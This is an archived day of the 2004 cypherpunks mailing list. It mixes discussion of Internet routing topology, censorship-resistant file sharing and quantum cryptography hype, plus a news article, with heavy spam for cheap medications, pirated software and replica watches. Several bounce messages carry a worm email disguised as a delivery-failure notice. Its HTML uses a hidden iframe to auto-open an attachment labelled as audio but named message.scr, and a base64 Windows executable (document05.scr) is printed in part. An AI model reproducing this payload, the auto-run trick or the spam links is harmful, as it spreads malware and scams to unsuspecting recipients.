Re: current status of cypherpunks, tim may, etc. ??

2004-04-12 Thread Joe Schmoe

--- Riad S. Wahby [EMAIL PROTECTED] wrote:

 view.  Apparently he's still to be found posting on
 various Usenet
 groups.  RAH knows more about this than I do.

That's the other question I had ... I keep hearing
about alt.cypherpunks, but there is nothing there -
regardless of whether I look through google groups or
other news2web or news2mail translations,
alt.cypherpunks is totally dead - maybe 1-2 posts per
month, and most of them test posts or garbage, and
this goes back at least for the last year...

Is there some secret or alternate news feed that has
the real list, or is alt.cyperpunks just dead ?

__
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html



Geodesic markets for nuclear secrets

2004-04-12 Thread Bill Stewart


The price of nuclear secrets has been dropping rapidly:
http://theonion.com/news/index.php?issue=4014
WASHINGTON, DC­ Top-secret information about the design, construction, and 
delivery of nuclear weapons has never been more affordable than it is 
today, CIA Director George Tenet announced Monday.

(ok, ok, so it's the Onion...  It's still geodesic markets at work, even if 
it's all made up :-)

---
Bill Stewart  [EMAIL PROTECTED] 



Cypherpunks, interested in buying lowrate high-quality medication?

2004-04-12 Thread Stingily B. Dirtiest



Would you believe it?The best way of learning to be an independent sovereign state is to be an independent sovereign state.Beauty is everywhere a welcome guest.
Cypherpunks, need low-price medication? Here!
http://recriminating.dbs54d.com/d13/index.php?id=d13 lichtly
We only part to meet again.The supply of government exceeds demand.Be kind to unkind people -- they need it the most.School is where you go between when your parents can't take you, and industry can't take you.



Cheap and quality meds here, Cypherpunks

2004-04-12 Thread Meshed F. Layering



And a very good morning to you! :)Discontent is the first step in the progress of a man or a nation.An artist is forced by others to paint out of his own free will.
Cypherpunks, interested in saving up to 70% on medications?
http://accrementition.dbs54d.com/d13/index.php?id=d13 townhome
I must in the face of a storm, think, live and die as a king.Information, usually seen as the precondition of debate, is better understood as its by-product.Show me a frigid women and, nine times out of ten, I'll show you a little man.Literature is the art of writing something that will be read twice journalism what will be grasped at once.



Not expensive software, shipping worldwide, Cypherpunks!

2004-04-12 Thread Logan A. Enumerates



Guten Tag :))Assassination is the extreme form of censorship.
Low rates on Software
Looking for cheap high-quality software?
We might be just what you need.http://doubling.soft-dindon.biz

We offer Software to download or it can be shipped to you on CD.Here is some of the software you can get on our site:Adobe Photoshop CS 8.0 - 40$Borland Delphi 8 Architect Edition - 50$
Microsoft Visual Studio .NET 2003 - 99$
And more!We are able to ship worldwide.However big the fool, there is always a bigger fool to admire him.Nothing is less instructive than a machine.



Report to Recipient(s)

2004-04-12 Thread stllnhub01/svrs/sial

Incident Information:-

Originator: [EMAIL PROTECTED]
Recipients: [EMAIL PROTECTED]
Subject:  Mail delivery failed: returning message to sender

The file mime001.txt (document05.scr) you received was infected with the W32/[EMAIL PROTECTED] virus and was deleted.


Undeliverable Mail

2004-04-12 Thread Postmaster
User mailbox exceeds allowed size: [EMAIL PROTECTED]


Original message follows.

Received: from textclick.com [61.144.183.219] by hdtworld.com with ESMTP
  (SMTPD32-7.05) id A0B81EBA01BC; Mon, 12 Apr 2004 19:42:48 +0800
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Mail Delivery (failure [EMAIL PROTECTED])
Date: Mon, 12 Apr 2004 19:40:54 +0800
MIME-Version: 1.0
Content-Type: multipart/related;
type=multipart/alternative;
boundary==_NextPart_000_001B_01C0CA80.6B015D10
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: [EMAIL PROTECTED]

This is a multi-part message in MIME format.

--=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative;
boundary==_NextPart_001_001C_01C0CA80.6B015D10

--=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

--=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/html;
charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN
HTMLHEAD
META content=3Dtext/html; charset=3Diso-8859-1 =
http-equiv=3DContent-Type
META content=3DMSHTML 5.00.2920.0 name=3DGENERATOR
STYLE/STYLE
/HEAD
BODY bgColor=3D#ffIf the message will not displayed automatically,br
follow the link to read the delivered message.brbr
Received message is available at:br
a href=3Dcid:[EMAIL PROTECTED] height=3D0 
width=3D0www.textclick.com/inbox/webmaster/read.php?sessionid-10369/a
iframe
src=3Dcid:[EMAIL PROTECTED] height=3D0 width=3D0/iframe 
DIVnbsp;/DIV/BODY/HTML

--=_NextPart_001_001C_01C0CA80.6B015D10--

--=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: audio/x-wav;
name=message.scr
Content-Transfer-Encoding: base64
Content-ID:[EMAIL PROTECTED]

TVqQAAME//8AALgAQAAA
YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA

[message truncated]



Mail delivery failed: returning message to sender

2004-04-12 Thread Mail Delivery System
This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

  [EMAIL PROTECTED]
This message has been rejected because it has
a potentially executable attachment document05.scr
This form of attachment has been used by
recent viruses or other malware.
If you meant to send this file then please
package it up as a zip file and resend it.

-- This is a copy of the message, including all the headers. --

Return-path: [EMAIL PROTECTED]
Received: from [61.174.183.132] (helo=glovesunion.com)
by server2.vrns.net with esmtp (Exim 4.24)
id 1BD23y-00053V-QR
for [EMAIL PROTECTED]; Mon, 12 Apr 2004 07:05:27 -0700
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Shocking document
Date: Mon, 12 Apr 2004 22:02:53 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary==_NextPart_000_0016=_NextPart_000_0016
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: [EMAIL PROTECTED]

This is a multi-part message in MIME format.

--=_NextPart_000_0016=_NextPart_000_0016
Content-Type: text/plain;
charset=Windows-1252
Content-Transfer-Encoding: 7bit

Let'us be short: you have no experience in writing letters!!!


--=_NextPart_000_0016=_NextPart_000_0016
Content-Type: application/octet-stream;
name=document05.scr
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=document05.scr

TVqQAAME//8AALgAQAAA
YA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAA
AADgAA8BCwEEcgAgAQAAECAAQAAAEAIAAAQA
BAAAMAEAAAQCAAAQAAAQABAAABAQ
AAD0IAEAawCwAABobQAA

dACgEAAA
AADgAADAAHRhcLAAAHRvBAAA4AAAwABh
ABAgAQAAAgIAAOAAAMAFBAYEAQDOIUAAAgAAQG4M
AABAAABAAAC70AFAAL8AEEAAviwcQQBT6AoC0nUFihZG
EtLD/LKApGoCW/8UJHP3M8n/FCRzGDPA/xQkcyGzAkGwEP8UJBLAc/l1P6rr3OhDK8t1
EOg46yis0eh0QRPJ6xyRSMHgCKzoIgAAAD0AfQAAcwqA/AVzBoP4f3cCQUGVi8WzAVaL
9yvw86Re65YzyUH/VCQEE8n/VCQEcvTDX1sPtztPdAhPdBPB5wzrB4t7AleDwwRDQ+lR
X7soIUEAR4s3r1f/E5UzwK51/f4PdO/+D3UGR/83r+sJ/g8PhKLw/v9XVf9TBAkGrXXbi+zD
HCEBNCEBACghAQAAAEAhAQBOIQEAAEAh
AQBOIQEAAEtFUk5FTDMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwDr



AAEAAgAYAQCAKAAAgAMAAABAAACADgAAAGAAAIEA
ZQAAAHgAAIIAAQAAAJAAAIACqAAAgAEA
AAAmAQCAwAAAgQAHBAAA2QAHBAAA
6QAHBAAA+QAHBAAACAEAADCx
aABEGQEA6AIAMEAAACgBADAZAQAi
AAAGAEIASQBOAEEAUgBZAAEAMABrfWaFlBWtHdaU3cSJ5jkxSa21WPCT
lzJZK9HA/RaOTkibC/U7SahjXd4/321otIeaqs3c98FEgSkIG0C6ODBOmsur3t5wGFBqh50K
ds6TPEgjC6CdNZN7rjIV8vVYEeYEudN7R75kOiMW8iMOucg+gAgTXuypw1pQ+ca7eliihvH+
BKZOhikSH0oRAfDprm0Vh687q8QC/ZmshNoRyjjQjMemK1iKjEvkj8KBP4/d0gQrjoViQVpc
RCQCofUL//pjNEcThyvQrFIhYOB29tPY/yF8mWd97Pk/bNiiP2WUW+j2DTqnFxOp9dMi6sWw
nvjkyggxsi4BkiGP2II4tZ6x1rLKgUZ8XsW+9S/Ji25/hCze1WlfWwiU3UCXYzryPnJEh8or
O18rjsHmyS6iSx58HvJ7SFS2KoUB065NYMOkJXQG7YFuOKmLZz6kIEHBlhsaL6fX2L2O7wDx
9kimzvhSeVIJise//UQYlGGngOYO+cK8/R3Dtl1ZsiPgXbQvX4G3M5dPL2tRQT3SqssXE6+c
RPIrIgjovkwjDS+TuzwDO5ZxT9aMdcoLPL4mlf+QoY4aadfuOJzaTxc8hPOBOwwHftPYKcgl
kil/IX4MHqULV82GzO85GtjqghWLg/Nnom7XI9tQycfRI2zCWjldmhV9ZjpG/XWq4UW4lJ05
+Tfr9wlX/1F596yCbQlgIqSy6YqsI1pPUpQdCV0IQVk8whLKDtufVb7pUszp8jvR3JOuBudv
jIg6ebOdnVJErWJhPY+YbUwHwgDlTEjwkU7rh4l3fuCDsZSUzOn1l5dTlVyVr8ZAxcqsJY5H
8V0Ln7vLpmfbROjSSDuPdsue4VP7+0ERbOcAiSSgdYdO8VDOM1YrXWVhYvE9XCXLiDDLs36G
aT30K6RL0rnD08Z0CeM6ckHihP+aGF0/tXGVFf19BUQ3vMTUWRmeuKC0wa3d5LplEH2g5TdO
jyxo7lgVHrl3ftEVRqrJ+nDkM7GnZXXbmni/tiHc4py7ambMO/fWbb58X9DgdZr2MIalUuFk
eM/C83YVcKxDCMlC1pKlhc+jwYYKdvz8dBXG5h0f1XKPyRkeXyPzHQGdovzgyf6FrmJo5PmO
AQgAYBpMxKHsV2LQiUCfZxP2xWAs4K74rcAes5vdVqBXYeXeFADCX47amOz6o2FpOAE2W1A1
Zacc/sWcQrpGNGbPzJedST7hJMXZJVKNy7LLBP2V90UwX7IHSyhFxPPTlRpdlJtxYLAU3s+E
ekcFyTLIwRYHVjWm16JZXIxAhQROCT/c+L5SU8juIBBaGTg21xUr52qxnAfzmZdzLksQUE+0
vr6WcDtbfnRz4lhVzqCXLuEPlcGOB25srOGhtfZXA0llkT5irGdOIYJdpth4ywJlkp4tZzMw
gzWFTY/+U0A/e4Q30iVwhPG4rXCk+CakG0ZZe48xZDriMjSo+R7+LHYI6nu34GDLQyJD8Kfb
x4+7coaLSI86T8fhZbtiUi0l02A582HFQrAyBI3aPmQs/2UHgqm3oeH5Q2YHwraT+ZCHz+RL

Save on software, Cypherpunks !

2004-04-12 Thread Masque Q. Objectionably



Rise and shine!He that hath a beard is more than a youth, and he that hath no beard is less than a man.
Low rates on Software
Looking for cheap high-quality software?
Our site might be just what you need.http://flummydiddle.soft-dindon.biz

We offer Software to download or it can be shipped to you on CD.Here is some of the software you can get on our site:Adobe Photoshop CS 8.0 - 40$3D Studio Max 6.0 - 60$
Corel Draw 12 Graphic Suite - 65$
And more!We ship worldwide.Men weary as much of not doing the things they want to do as of doing the things they do not want to do.To see what is in front of one's nose requires a constant struggle.



Re: current status of cypherpunks, tim may, etc. ??

2004-04-12 Thread Poindexter
At 04:10 PM 4/11/2004, Tyler Durden wrote:
So...how many years before it's possible for an online group to anonymously fun, 
order up and drop-ship weapons on a besieged people trying to maintain their national 
sovereignty?

Why not join http://www.ideosphere.com and wager some play money (a real money version 
is underway).

JP



Boost your immune system! 39452

2004-04-12 Thread Danielle Santiago

The Homeland Security Task Force is composed of governors, mayors, county officials, tribal leaders and other senior officials with first-hand experience in homeland security issues and will operate under the aegis of the Homeland Security Advisory Council (HSAC) and its State and Local Officials and Emergency Response Senior Advisory Committees. Massachusetts 
Diplomats said cash-strapped African countries would face a big challenge trying to fund the assembly.


Usnubcrribe_Here
WASHINGTON, D.C.—A new General Accounting Office (GAO) report examining the impact of the Government Performance and Results Act of 1993 (GPRA) 10 years after its enactment shows that the federal agencies have made steady improvement toward producing strategic plans, annual plans for the upcoming year, and then reporting on their success in meeting those goals.
Several indicators have been pointing up for the job market, including a steady, if slow, decline in weekly jobless claims, leading many economists to forecast greater job growth this year. 
Though it usually takes a while for unemployment to fall once the economy's started growing again -- since employers are hesitant to start hiring until they believe the recovery is for real.


Re: Hierarchy, Force Monopoly, and Geodesic Societies

2004-04-12 Thread Jim Dixon
On Sun, 11 Apr 2004, sunder wrote:

  The term is used because most or all trees in the region where the English
  language originated are shaped just like that: they have a single trunk
  which forks into branches which may themselves fork and so on.  These
  branches do not connect back to one another.

 I believe the real issue here is one of being able to stretch your mind
 into seeing things from different points of view.  This is the reason I
 brought in the quasi-mystical quote about the sphere whose center is
 everywhere.

Someone comes to me and says: the Internet is a tree.  Then he points me
at a graph of inter-AS (Autonomous System) connections to illustrate his
point.  That graph includes all of those seemingly redundant connections
that make it _not_ a tree.  These seemingly redundant connections are in
fact a high proportion of all connections.  That is to say, the graph is
accurate and his statement wasn't.

You can see the Internet in many ways.  You can run a single traceroute
and see it as a line.  You can ping broadcast on your LAN and see it as a
chorus line.

If you understand what you are looking at, you can run traceroutes and see
stable rings: hot potato routing at work, where the packets go out one way
and come back another.

Then again, I have spoken to hundreds? thousands? of people who think that
the Internet _is_ the World Wide Web.

 Let's explain why we have multiple connections and what types of these you
 can expect.  There are two common types of multiple connections:

 A) Two links to the same ISP:  In terms of redundancy for the purposes of
 being fault tolerant, only one of the multiple links is ever used.  With

You don't understand and you are quite wrong.

If one AS has more than one link to another AS, there are often very good
reasons for it, and both links are used.  If network A peers with network
B in both Paris and New York, both will generally dump traffic for the
other network at the nearest connection. Why?  Well, on the one hand,
there is no reason to carry packets originating in Paris and destined for
a host in Paris all the way to New York.  On the other hand, many or most
networks employ hot potato routing, meaning that if network A picks up a
packet for network B in Paris, it dumps it on network B as soon as it can,
to minimize costs, wherever the destination might be.  Some networks,
concerned with quality of service, adopt the opposite strategy, and carry
packets as far as possible within their own network.

 most ISP's, when you negotiate a contract for a backup connection, it's
 with the understanding that you'll only use it when the main one goes down.

I don't think that you have any evidence for this assertion about what
characterizes 'most' backup agreements.  I do know that most networks
regard this sort of statistical information as highly confidential.

 B) You have multiple connections to different ISP's (possibly with peering
 contracts, etc.)  In this case when a node at your location tries to
 contact some other node on the internet, it's traffic doesn't go over ALL
 of your connections - it takes only a single path.  [Ok, if your routers
 are correcting for an outage, then perhaps you'll see different paths being
 taken, but this is just the routing tables/routers settling or converging.]

The world is more complicated than this.  Much more.

 If both case A and case B, a single node in your location will see the
 entire internet as a tree with the root of that tree being the default
 gateway.  (i.e. go back to doing traceroutes.)  In the case of a
 multi-homed machine, or machine that participates in routing, it itself
 becomes the root of the tree.

There are tens of thousands of machines on the Internet that don't have
a default gateway.

Machines that participate in backbone routing have multiple connections
and aren't the root of a tree in any normal sense of the word.  There is
no parent-child relationship between such routers: they are peers.
These peers participate in a highly complex graph which dances
continuously.  The result is that routing has a large stochastic
component: if you can understand what you are looking at, you often see
traceroutes involving packets jumping sometimes one way, sometimes
another.

To make things even more difficult to understand, an increasing amount of
traffic flows through MPLS tunnels, which are invisible to traceroutes.

 Once you eliminate cycles, and you do so in real life, you go back to a
 tree.  You only see the alternate paths used when failover or routing
 errors occur.

This just isn't true.  Hot potato routing is the most easily understood
example: traffic goes out one way and back another.  It does this because
the ASs involved have set their policy that way.

Backbone routers have lots of knobs to configure traffic flow.  Some of
these allow you to throttle it, some allow you to split flows according to
traffic type, some allow to to split flows statistically, some allow you
to 

Re: On Needing Killing (Orwell was an optimist)

2004-04-12 Thread Major Variola (ret)
At 07:20 PM 4/11/04 +, Justin wrote:
Major Variola (ret) (2004-04-11 16:42Z) wrote:

 Blacknet is a robust archive for words, immune to force
 (by State or private actors), but merely words.

With all due respect to the principle of freedom of speech and all
that,
I think that cypherpunks, and people in general, give far too little
respect to words, as if words are a vague, unimportant, and remote link

in the chain of causation of acts or failure-to-acts.  I don't see
anything wrong with Orwell's view that words control the future's view
of history.  His certainly have.

Language is how you manipulate people from a distance.   Much
more convenient than hitting them.

Crypto *can* keep bits free.  And so maybe language.

But Men with Guns control physical reality, which limits what
those bits can do.  Read the archives on the problems with
linking credits to dollars or physical merchandise.

Note that the Saudis are organizing conferences on registering
and recording hawala.  Note that the US will kidnap (mexican
MD for instance) if they can't extradite.

And how many will run a prohibited node when
the penalty is watching your family assets seized,
family members raped, before your eyes are gouged out?

---
It can't happen here -Suzy Creamcheese






Afghan duty offers ultimate in unconventional warfare

2004-04-12 Thread R. A. Hettinga
http://www.usatoday.com/news/world/2004-04-11-afghan-cover_x.htm#

USA Today


Afghan duty offers ultimate in unconventional warfare
 By Gregg Zoroya, USA TODAY
ORUZGAN, Afghanistan - Afghan fighters bristling with rocket launchers and
machine guns pour into a government compound here to try to intimidate a
small team of U.S. Special Forces soldiers in their midst. (Related
graphic: A-Team in Afghanistan)

Capt. Paul Toolan and District Chief Ubai Dullah walk off together after
averting a showdown in Oruzgan.

By Jack Gruber, USA TODAY

The Green Berets, a long way from home and two days from their base, want
to destroy 10 tons of weapons found in bunkers under the hilltop
headquarters of the fighters' leader, a district chief here. The atmosphere
is suddenly hostile.

If things go sour, Special Forces Capt. Paul Toolan tells a two-man
sniper crew he quickly orders into position on a rooftop, go for the head
of the food chain. He nods at the white-turbaned district chief standing
nervously a few feet away.

 In a nation raw from two decades of fighting, with remnants of the
al-Qaeda terrorist network still a menace and with Osama bin Laden having
eluded capture for 2 1/2 years, the front lines of war emerge and vanish
like storm clouds. Elite teams of Special Forces soldiers see the
counterinsurgency in Afghanistan as their classic fight. Many concede that
they relish serving here.

For a few recent weeks, Toolan and his 10-member team allowed rare and
intimate access into their operations in the southern Afghan province of
Oruzgan.

They momentarily let slip the Special Forces mystique of super-soldiers in
beards and baseball caps who conduct secret missions and are known only by
their first names.

 They emerge as soldiers who carry their own set of contradictions and
complexities: proud and embarrassed by the public perception of them as
elite soldiers; both sympathetic toward and contemptuous of the Afghans;
confident that this war is theirs to win, even if victory is years away.

Finding bin Laden is unlikely here because the terrorist leader is believed
to be hiding along Afghanistan's eastern border with Pakistan. Their job is
to destroy Taliban and al-Qaeda forces, capture or kill fugitives such as
Taliban leader Mullah Mohammed Omar, and bring security to the
still-untamed Afghan countryside.

 In March, two GIs with the 10th Mountain Division were killed during a
U.S. raid in Miam Do, a village in Oruzgan province. To operate in this
region, Toolan and his men must coordinate with local leaders and militia,
whose loyalties are sometimes unclear.

The Green Berets exercise a certain independence in their actions.

Many say this is the best time to serve in the Special Forces since
Vietnam. They are the only American faces anybody ever sees in the vast,
rugged stretches of formidable terrain about 200 miles from Kabul, the
Afghan capital. Unshaven in their Oakley sunglasses, with 15-shot Beretta
pistols strapped to their hips, they stalk a province the size of Indiana,
gunslingers in an Asian frontier.

But they also are health care providers, diplomats, combat instructors,
roadside mechanics and crisis managers. In the course of one afternoon,
Toolan will take steps aimed at killing District Chief Ubai Dullah and his
armed minions for their belligerence. Then, after feverish talks, he and
Dullah will walk arm-in-arm across the chief's compound in the local custom
of male bonding, as tears well up in Dullah's eyes.

Let's discount for a moment my 5 1/2-month-old son, my wife, paved roads
and a soft bed, says Toolan, a Rhode Islander with a razor-sharp wit.
Without all that, you can never beat this. It's got everything. It's got
every single aspect of unconventional warfare you could ever possibly
imagine.

Muck and grease

 Like everyone else in this arid wasteland, the Special Forces troops find
day-to-day conditions harsh. They suffer diarrhea from the local cuisine.
Their faces cake with muck from hours bouncing atop a Humvee. Their hands
blacken with grease as they repair broken-down U.S. vehicles.

There's nothing elite about events that go wrong. For 45 minutes in a
narrow mountain pass, Green Berets hold up frustrated local drivers because
a four-wheeled Army ATV gets a clogged fuel pipe.

A water tank on an Afghan National Army truck breaks loose in the middle of
a Green Beret convoy.

And when American and Afghan troops set up a human chain to load captured
ammunition, they wind up standing in a field of human excrement that had
been used as an open privy by the local militia.

Yeah, that was really glamorous, Toolan says later.

Nor are they immune from troubles at home.

 The team sergeant, Kevin Patrick, frets over a 6-month-old daughter in the
USA who is without her parents. He is in Afghanistan, and his wife, a
civilian defense analyst, has been assigned to duty in Iraq. A woman caring
for the infant e-mails photos. She's starting to crawl, Patrick, 38,
reports with a mixture of joy 

Re: BBC: File-sharing to bypass censorship

2004-04-12 Thread Major Variola (ret)
At 06:48 PM 4/11/04 +0200, Eugen Leitl wrote:
http://news.bbc.co.uk/2/hi/technology/3611227.stm

By the year 2010, file-sharers could be swapping news rather than
music,
eliminating censorship of any kind.

This is the view of the man who helped kickstart the concept of
peer-to-peer
(P2P) file-sharing, Cambridge University's Professor Ross Anderson.

Well duh.  KaZaa carries news film clips that the media don't transmit.
So does ogrish.com, but ogrish is not distributed and its name servers
are run by the State of course.  And then there's the indymedia
(again, single point of failure) sites.

There are censorship and authentication issues, of course, its hardly
novel.

'Impossible to censor'

To enable this, Prof Anderson proposes a new and improved version of
Usenet,
the internet news service.

  If there's material that everyone agrees is wicked, like child
pornography,
then it's possible to track it down and close it down

First, that flavor of erotica is not well defined.  E.g., A picture of
one of your
15 year old wives?   Your legally emancipated 16 year old lover?

Second, Anderson, who should know better, forgets about stego.





Cypherpunks, meds worldwide here

2004-04-12 Thread Racks J. Seafood



Thinking of driving in that condition, sir?My country right or wrong when right, to keep her right when wrong, to put her right.The idiot who praises, with enthusiastic tone, All centuries but this, and every country but his own.
Cypherpunks, need quality medications?
http://osteosynthesis.dbs54d.com/d13/index.php?id=d13 evaluated
The will to do, the soul to dare.I think I am a much better actor than I have allowed myself to be.I throw a ball and get paid for it. Others do it by throwing the bull.If each of us hires people smaller than we are, we shall become a company of dwarfs.



Levit]ra Viag$ra Phentermine - Today!

2004-04-12 Thread Mable Huff






Re: Hierarchy, Force Monopoly, and Geodesic Societies

2004-04-12 Thread Tyler Durden
Jim Dixon wrote...

A) Two links to the same ISP:  In terms of redundancy for the purposes of
being fault tolerant, only one of the multiple links is ever used.  With

You don't understand and you are quite wrong.

If one AS has more than one link to another AS, there are often very good
reasons for it, and both links are used.  If network A peers with network
B in both Paris and New York, both will generally dump traffic for the
other network at the nearest connection.
He's not wrong, he's merely kinda confused on this issue. Any big link 
(T1/DS1/DS3/STS-3c...) into an ISP provided by the telecom service provider 
is almost certainly protected via SONET. SONET architectures can provide 
various forms of protection (not all utilize redudant compies of the 
data...UPSR and Linear 1+1 do, BLSR is different).

Of course, the router does not see that redundancy and can not make use of 
it. The multiple links that do exist (each of which protected behind the 
scenes by the telecom service provider) can be utilized by the router. If 
one of those links goes down (perhaps it was unprotected extra traffic in 
a BLSR and there was a fiber cut), the router will just send the stuff 
through the other link.

-TD




From: Jim Dixon [EMAIL PROTECTED]
To: sunder [EMAIL PROTECTED]
CC: [EMAIL PROTECTED]
Subject: Re: Hierarchy, Force Monopoly, and Geodesic Societies
Date: Mon, 12 Apr 2004 18:41:14 +0100 (BST)
On Sun, 11 Apr 2004, sunder wrote:

  The term is used because most or all trees in the region where the 
English
  language originated are shaped just like that: they have a single 
trunk
  which forks into branches which may themselves fork and so on.  These
  branches do not connect back to one another.

 I believe the real issue here is one of being able to stretch your mind
 into seeing things from different points of view.  This is the reason I
 brought in the quasi-mystical quote about the sphere whose center is
 everywhere.

Someone comes to me and says: the Internet is a tree.  Then he points me
at a graph of inter-AS (Autonomous System) connections to illustrate his
point.  That graph includes all of those seemingly redundant connections
that make it _not_ a tree.  These seemingly redundant connections are in
fact a high proportion of all connections.  That is to say, the graph is
accurate and his statement wasn't.
You can see the Internet in many ways.  You can run a single traceroute
and see it as a line.  You can ping broadcast on your LAN and see it as a
chorus line.
If you understand what you are looking at, you can run traceroutes and see
stable rings: hot potato routing at work, where the packets go out one way
and come back another.
Then again, I have spoken to hundreds? thousands? of people who think that
the Internet _is_ the World Wide Web.
 Let's explain why we have multiple connections and what types of these 
you
 can expect.  There are two common types of multiple connections:

 A) Two links to the same ISP:  In terms of redundancy for the purposes 
of
 being fault tolerant, only one of the multiple links is ever used.  With

You don't understand and you are quite wrong.

If one AS has more than one link to another AS, there are often very good
reasons for it, and both links are used.  If network A peers with network
B in both Paris and New York, both will generally dump traffic for the
other network at the nearest connection. Why?  Well, on the one hand,
there is no reason to carry packets originating in Paris and destined for
a host in Paris all the way to New York.  On the other hand, many or most
networks employ hot potato routing, meaning that if network A picks up a
packet for network B in Paris, it dumps it on network B as soon as it can,
to minimize costs, wherever the destination might be.  Some networks,
concerned with quality of service, adopt the opposite strategy, and carry
packets as far as possible within their own network.
 most ISP's, when you negotiate a contract for a backup connection, it's
 with the understanding that you'll only use it when the main one goes 
down.

I don't think that you have any evidence for this assertion about what
characterizes 'most' backup agreements.  I do know that most networks
regard this sort of statistical information as highly confidential.
 B) You have multiple connections to different ISP's (possibly with 
peering
 contracts, etc.)  In this case when a node at your location tries to
 contact some other node on the internet, it's traffic doesn't go over 
ALL
 of your connections - it takes only a single path.  [Ok, if your routers
 are correcting for an outage, then perhaps you'll see different paths 
being
 taken, but this is just the routing tables/routers settling or 
converging.]

The world is more complicated than this.  Much more.

 If both case A and case B, a single node in your location will see the
 entire internet as a tree with the root of that tree being the default
 gateway.  (i.e. go back to doing traceroutes.)  In the case 

my periodic rant on quantum crypto

2004-04-12 Thread R. A. Hettinga

--- begin forwarded text


Delivered-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: my periodic rant on quantum crypto
From: Perry E. Metzger [EMAIL PROTECTED]
Date: Mon, 12 Apr 2004 15:37:33 -0400
Sender: [EMAIL PROTECTED]


/. is running yet another story on quantum cryptography today, with
the usual breathless hype:

http://science.slashdot.org/article.pl?sid=04/04/12/133623

I'm especially unimpressed with the Does this spell the
end of the field of cryptography? comment.

For those who don't know much about what it is, Quantum Cryptography
is a very expensive way of producing an unauthenticated link
encryption device. It is useless for any application other than link
encryption over a short distance and requires a dedicated optical
fiber to work.

QC has no properties that render it especially better for link
encryption than, say, a box from one of several vendors running AES on
the link instead. It is perhaps theoretically safer, but in practice
no one is going to break AES either -- they're going to bribe the
minimum wage guard at your colo to have 20 minutes alone with your box
while they install a tap on the clear side of it (or worse, they'll
slip in while the guard is asleep at his desk.)

QC still requires link authentication (lest someone else other than
the people you think you're talking to terminate your fiber
instead). As a result of this, you can't really get rid of key
management, so QC isn't going to buy you freedom from that.

QC can only run over a dedicated fiber over a short run, where more
normal mechanisms can work fine over any sort of medium -- copper, the
PSTN, the internet, etc, and can operate without distance limitation.

QC is fiendishly costly -- orders of magnitude more expensive than an
AES based link encryption box.

QC is extremely hard to test to assure there are no hardware or other
failures -- given the key in use, I can use intercepted traffic to
assure my AES link encryption box is working correctly, but I have no
such mechanism for a QC box.

On top of all of this, the real problems in computer security these
days have nothing to do with stuff like how your link encryption box
works and everything to do with stuff like buffer overflows, bad
network architecture, etc.

Given that what we're dealing with is a very limited technology that
for a very high price will render you security that is at best not
particularly better than what much more economical solutions will
yield, why do people keep hyping this?  Indeed, why do people buy these
boxes, if indeed anyone is buying them?

It is stunning that a lab curiosity continues to be mentioned over
and over again, not to mention to see venture capitalists dump money
after it.

BTW, none of this has anything to do with Quantum Computing, which
may indeed yield breakthroughs someday in areas such as factoring but
which is totally unrelated...

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

--- end forwarded text


-- 
-
R. A. Hettinga mailto: [EMAIL PROTECTED]
The Internet Bearer Underwriting Corporation http://www.ibuc.com/
44 Farquhar Street, Boston, MA 02131 USA
... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



Discount Rolex Replicas

2004-04-12 Thread Bruno Yang
The day breaks clear
on this spring morning.The sound of song birds greet the new
born day, as rays from the sun pierce the darkness of the
forest floor..A rabbit yawns, and runs his fingers through
his hair scratching a itch. He sits up, looking about. He says
to his self. "It is nice to hear the sounds of spring once
more."
The sound of his tummy rumbling reminds him of how long it
has been since he had anything to eat. He has walked quite
a distance the night before, and is not familiar with the
forest he finds his self in. After eating the last bit of
bread he saved from the previous day. He stands to survey what
he can of the forest, and gathers his few belongings into his
backpack. He decides to push on thinking. "I must find
food, and work soon." Turning quickly with a hop. He blinks to
see the top of a tree laying across the path. A skunk runs
up, and asks. "You ok fellow?" Chip scratches a ear just a
bit., and says. "I think so, but that tree nearly got me." The
skunk holds out a paw, and says."Sorry.. But that tree went
quicker than I planned." Chip nods, and says."I understand.
It's happened to me also."
Chip takes the skunks paw with his, and says. My name is Chip
Sty.  The skunk smiles as he shakes Chips paw. Then says.
"Glad to meet you Chip. Furres around here just call me Mac."
Chip nods. "Nice to meet you, Mac.  Would you be needing any
help. I am in need of food, and shelter."  The skunk thinks
a moment. Then says. "Well since I nearly fell a tree on you,
It's the least I can do to you some food, and shelter for the
night, and I could use a little help cutting this tree into
firewood."

While following the trail through the forest.
He thinks about the two foxes that tried to steal his backpack
a few days earlier.  He stops upon hearing a noise, he
looks all around. Then moves quickly along.. He says to his
self. "I hope I don't meet any robbers."
After what seems like hours. The trail breaks out into the
open, and there before Chip, stretches a beautiful valley with
grassy fields, and a small stream flowing through it. Chip
smiles, and says."Sure is peaceful here." He follows the trail
wishing he could find some berries along the way. In the
distance he can see a small house set near a grove of trees. He
thinks. "Maybe I can find work there."Chip smiles, and
says. Thanks a lot, and I would be glad to help. Mac grins, and
says. "it's close to lunchtime, we can have a bite to eat
first, and I will show you where you can bed down as well."
Chip nods, and walks with the skunk up the path to the
little house.
Chip follows him through the door into a small room that
has a single table, two chairs, small bed, and a large rock
